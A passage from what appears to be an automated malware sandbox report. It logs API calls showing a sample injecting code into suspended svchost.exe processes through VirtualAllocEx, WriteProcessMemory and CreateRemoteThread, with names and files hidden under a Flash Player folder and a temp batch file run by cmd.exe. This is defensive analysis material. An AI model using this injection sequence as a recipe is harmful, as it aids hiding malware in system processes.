[0093.787] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="FD") returned 2 [0093.787] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="A0") returned 2 [0093.787] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="09") returned 2 [0093.787] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="EF") returned 2 [0093.787] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="D2") returned 2 [0093.787] wvnsprintfW (in: pszDest=0x18f650, cchDest=3, pszFmt="%02X", arglist=0x18f62c | out: pszDest="11") returned 2 [0093.787] OpenEventW (dwDesiredAccess=0x2, bInheritHandle=0, lpName="7F0E6CA175D0ADDEF923FDA009EFD211") returned 0x148 [0093.788] SetEvent (hEvent=0x148) returned 1 [0093.788] CloseHandle (hObject=0x148) returned 1 [0093.792] PathCombineW (in: pszDest=0x418f48, pszDir="SOFTWARE\\Microsoft", pszFile="Acuhci" | out: pszDest="SOFTWARE\\Microsoft\\Acuhci") returned="SOFTWARE\\Microsoft\\Acuhci" [0093.795] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18f810, cbMultiByte=8, lpWideCharStr=0x419730, cchWideChar=10 | out: lpWideCharStr="Omegovna") returned 8 [0093.800] PathCombineW (in: pszDest=0x419428, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv" [0093.806] PathCombineW (in: pszDest=0x419748, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\Microsoft OneDrive.rig" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\Microsoft OneDrive.rig") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\Microsoft OneDrive.rig" [0093.808] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x18f828 | out: phkResult=0x18f828*=0x148) returned 0x0 [0093.808] RegQueryValueExW (in: hKey=0x148, lpValueName="Omegovna", lpReserved=0x0, lpType=0x18f854, lpData=0x0, lpcbData=0x18f83c*=0x0 | out: lpType=0x18f854*=0x0, lpData=0x0, lpcbData=0x18f83c*=0x0) returned 0x2 [0093.808] RegCloseKey (hKey=0x148) returned 0x0 [0093.808] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\ro4p00rrfog3ie0ev3.ecv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0093.808] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x18f82c | out: lpFileSize=0x18f82c*=0) returned 1 [0093.808] CloseHandle (hObject=0x148) returned 1 [0214.772] SHGetFolderPathW (in: hwnd=0x0, csidl=41, hToken=0x0, dwFlags=0x0, pszPath=0x18f698 | out: pszPath="C:\\Windows\\SysWOW64") returned 0x0 [0214.775] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="E5") returned 2 [0214.775] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="8E") returned 2 [0214.775] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="FF") returned 2 [0214.775] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="54") returned 2 [0214.775] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="09") returned 2 [0214.775] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="68") returned 2 [0214.775] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="A4") returned 2 [0214.775] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="36") returned 2 [0214.775] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="E9") returned 2 [0214.776] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="82") returned 2 [0214.776] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="FC") returned 2 [0214.776] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="FA") returned 2 [0214.776] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="1C") returned 2 [0214.776] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="04") returned 2 [0214.776] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="45") returned 2 [0214.776] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="A2") returned 2 [0214.776] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="E58EFF540968A436E982FCFA1C0445A2") returned 0x0 [0214.776] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="E58EFF540968A436E982FCFA1C0445A2") returned 0x0 [0214.777] PathCombineW (in: pszDest=0x18f698, pszDir="C:\\Windows\\SysWOW64", pszFile="svchost.exe -k netsvcs" | out: pszDest="C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs") returned="C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs" [0214.777] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18f650*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f5f0 | out: lpCommandLine="C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs", lpProcessInformation=0x18f5f0*(hProcess=0x134, hThread=0x150, dwProcessId=0x634, dwThreadId=0x5a0)) returned 1 [0214.814] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="CE") returned 2 [0214.814] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="E4") returned 2 [0214.814] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="8A") returned 2 [0214.815] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="FA") returned 2 [0214.815] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="23") returned 2 [0214.815] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="1A") returned 2 [0214.815] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="B2") returned 2 [0214.815] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="1C") returned 2 [0214.815] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="A6") returned 2 [0214.815] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="E2") returned 2 [0214.815] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="43") returned 2 [0214.815] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="7D") returned 2 [0214.815] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="B8") returned 2 [0214.815] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="44") returned 2 [0214.815] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="BA") returned 2 [0214.815] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="D7") returned 2 [0214.816] CreateMutexW (lpMutexAttributes=0x4177e4, bInitialOwner=1, lpName="CEE48AFA231AB21CA6E2437DB844BAD7") returned 0x15c [0214.816] GetLastError () returned 0x0 [0214.816] VirtualAllocEx (hProcess=0x134, lpAddress=0x0, dwSize=0x1c000, flAllocationType=0x3000, flProtect=0x40) returned 0xb0000 [0214.910] WriteProcessMemory (in: hProcess=0x134, lpBaseAddress=0xb0000, lpBuffer=0xb720590*, nSize=0x1c000, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0xb720590*, lpNumberOfBytesWritten=0x0) returned 1 [0214.911] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x15c, hTargetProcessHandle=0x134, lpTargetHandle=0x18f5bc, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x18f5bc*=0x4) returned 1 [0214.911] WriteProcessMemory (in: hProcess=0x134, lpBaseAddress=0xc76c4, lpBuffer=0x18f5c4*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x18f5c4*, lpNumberOfBytesWritten=0x0) returned 1 [0214.911] WriteProcessMemory (in: hProcess=0x134, lpBaseAddress=0xc77d0, lpBuffer=0x18f5b8*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x18f5b8*, lpNumberOfBytesWritten=0x0) returned 1 [0214.911] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x13c, hTargetProcessHandle=0x134, lpTargetHandle=0x18f5a0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x18f5a0*=0x8) returned 1 [0214.911] WriteProcessMemory (in: hProcess=0x134, lpBaseAddress=0xc7d38, lpBuffer=0x18f5a0*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x18f5a0*, lpNumberOfBytesWritten=0x0) returned 1 [0214.912] CreateRemoteThread (in: hProcess=0x134, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xb95bc, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x158 [0214.912] WaitForSingleObject (hHandle=0x158, dwMilliseconds=0x7d0) returned 0x0 [0215.007] CloseHandle (hObject=0x158) returned 1 [0215.007] CloseHandle (hObject=0x15c) returned 1 [0215.007] CloseHandle (hObject=0x150) returned 1 [0215.007] CloseHandle (hObject=0x134) returned 1 [0215.007] SHGetFolderPathW (in: hwnd=0x0, csidl=41, hToken=0x0, dwFlags=0x0, pszPath=0x18f698 | out: pszPath="C:\\Windows\\SysWOW64") returned 0x0 [0215.007] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="20") returned 2 [0215.007] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="BC") returned 2 [0215.008] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="29") returned 2 [0215.008] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="E1") returned 2 [0215.008] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="35") returned 2 [0215.008] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="FB") returned 2 [0215.008] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="9B") returned 2 [0215.008] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="01") returned 2 [0215.008] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="28") returned 2 [0215.008] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="51") returned 2 [0215.008] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="87") returned 2 [0215.008] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="E3") returned 2 [0215.008] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="B5") returned 2 [0215.008] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="59") returned 2 [0215.008] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="3C") returned 2 [0215.008] wvnsprintfW (in: pszDest=0x18f380, cchDest=3, pszFmt="%02X", arglist=0x18f35c | out: pszDest="C8") returned 2 [0215.008] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="20BC29E135FB9B01285187E3B5593CC8") returned 0x0 [0215.008] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="20BC29E135FB9B01285187E3B5593CC8") returned 0x0 [0215.008] PathCombineW (in: pszDest=0x18f698, pszDir="C:\\Windows\\SysWOW64", pszFile="svchost.exe -k netsvcs" | out: pszDest="C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs") returned="C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs" [0215.008] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18f650*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f5f0 | out: lpCommandLine="C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs", lpProcessInformation=0x18f5f0*(hProcess=0x150, hThread=0x134, dwProcessId=0x5fc, dwThreadId=0xa7c)) returned 1 [0215.010] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="1F") returned 2 [0215.010] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="4C") returned 2 [0215.010] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="22") returned 2 [0215.010] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="56") returned 2 [0215.010] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="51") returned 2 [0215.010] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="07") returned 2 [0215.010] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="A3") returned 2 [0215.010] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="4A") returned 2 [0215.010] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="D7") returned 2 [0215.010] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="3C") returned 2 [0215.010] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="B0") returned 2 [0215.010] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="F5") returned 2 [0215.010] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="85") returned 2 [0215.010] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="F8") returned 2 [0215.010] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="F7") returned 2 [0215.010] wvnsprintfW (in: pszDest=0x18f030, cchDest=3, pszFmt="%02X", arglist=0x18f00c | out: pszDest="7C") returned 2 [0215.010] CreateMutexW (lpMutexAttributes=0x4177e4, bInitialOwner=1, lpName="1F4C22565107A34AD73CB0F585F8F77C") returned 0x158 [0215.010] GetLastError () returned 0x0 [0215.010] VirtualAllocEx (hProcess=0x150, lpAddress=0x0, dwSize=0x1c000, flAllocationType=0x3000, flProtect=0x40) returned 0x70000 [0215.011] WriteProcessMemory (in: hProcess=0x150, lpBaseAddress=0x70000, lpBuffer=0xb720590*, nSize=0x1c000, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0xb720590*, lpNumberOfBytesWritten=0x0) returned 1 [0215.012] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x158, hTargetProcessHandle=0x150, lpTargetHandle=0x18f5bc, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x18f5bc*=0x4) returned 1 [0215.012] WriteProcessMemory (in: hProcess=0x150, lpBaseAddress=0x876c4, lpBuffer=0x18f5c4*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x18f5c4*, lpNumberOfBytesWritten=0x0) returned 1 [0215.012] WriteProcessMemory (in: hProcess=0x150, lpBaseAddress=0x877d0, lpBuffer=0x18f5b8*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x18f5b8*, lpNumberOfBytesWritten=0x0) returned 1 [0215.012] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x13c, hTargetProcessHandle=0x150, lpTargetHandle=0x18f5a0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x18f5a0*=0x8) returned 1 [0215.013] WriteProcessMemory (in: hProcess=0x150, lpBaseAddress=0x87d38, lpBuffer=0x18f5a0*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x18f5a0*, lpNumberOfBytesWritten=0x0) returned 1 [0215.013] CreateRemoteThread (in: hProcess=0x150, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x795bc, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x15c [0215.013] WaitForSingleObject (hHandle=0x15c, dwMilliseconds=0x7d0) returned 0x0 [0215.556] CloseHandle (hObject=0x15c) returned 1 [0215.556] CloseHandle (hObject=0x158) returned 1 [0215.556] CloseHandle (hObject=0x134) returned 1 [0215.556] CloseHandle (hObject=0x150) returned 1 [0215.556] CloseHandle (hObject=0x14c) returned 1 [0215.556] ExitProcess (uExitCode=0x0) [0215.557] UnhookWindowsHookEx (hhk=0x201e7) returned 1 [0215.558] CloseHandle (hObject=0x7c) returned 1 [0215.558] CloseHandle (hObject=0x80) returned 1 [0215.558] VirtualFree (lpAddress=0x1e00000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0215.562] HeapDestroy (hHeap=0x2a0000) returned 1 Thread: id = 109 os_tid = 0x980 Thread: id = 117 os_tid = 0x24c [0123.855] GetCurrentThreadId () returned 0x24c [0191.703] GetCurrentThreadId () returned 0x24c Thread: id = 118 os_tid = 0x184 [0123.858] GetCurrentThreadId () returned 0x184 Process: id = "8" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x79683000" os_pid = "0x7f0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x65c" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /c \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\updaa5900b0.bat\"" cur_dir = "C:\\Users\\aETAdzjz\\Desktop\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:00010636" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1673 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1674 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1675 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1676 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1677 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 1678 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1679 start_va = 0x230000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 1680 start_va = 0x49fa0000 end_va = 0x49febfff entry_point = 0x49fa0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 1681 start_va = 0x77090000 end_va = 0x77238fff entry_point = 0x77090000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1682 start_va = 0x77270000 end_va = 0x773effff entry_point = 0x77270000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1683 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1684 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1685 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1686 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1687 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1688 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1689 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1690 start_va = 0x440000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 1691 start_va = 0x746f0000 end_va = 0x746f7fff entry_point = 0x746f0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1692 start_va = 0x74700000 end_va = 0x7475bfff entry_point = 0x74700000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1693 start_va = 0x74760000 end_va = 0x7479efff entry_point = 0x74760000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1694 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1695 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1696 start_va = 0x70000 end_va = 0xd6fff entry_point = 0x70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1697 start_va = 0x690000 end_va = 0x78ffff entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 1698 start_va = 0x75250000 end_va = 0x75295fff entry_point = 0x75250000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1699 start_va = 0x759f0000 end_va = 0x75afffff entry_point = 0x759f0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1700 start_va = 0x76e70000 end_va = 0x76f69fff entry_point = 0x0 region_type = private name = "private_0x0000000076e70000" filename = "" Region: id = 1701 start_va = 0x76f70000 end_va = 0x7708efff entry_point = 0x0 region_type = private name = "private_0x0000000076f70000" filename = "" Region: id = 1702 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1703 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1704 start_va = 0x3a0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 1705 start_va = 0x74870000 end_va = 0x74876fff entry_point = 0x74870000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\SysWOW64\\winbrand.dll" (normalized: "c:\\windows\\syswow64\\winbrand.dll") Region: id = 1706 start_va = 0x74dc0000 end_va = 0x74dcbfff entry_point = 0x74dc0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1707 start_va = 0x74dd0000 end_va = 0x74e2ffff entry_point = 0x74dd0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1708 start_va = 0x74e90000 end_va = 0x74ea8fff entry_point = 0x74e90000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1709 start_va = 0x75130000 end_va = 0x751bffff entry_point = 0x75130000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1710 start_va = 0x752a0000 end_va = 0x7534bfff entry_point = 0x752a0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1711 start_va = 0x755b0000 end_va = 0x7564cfff entry_point = 0x755b0000 region_type = mapped_file name = "usp10.dll" filename = 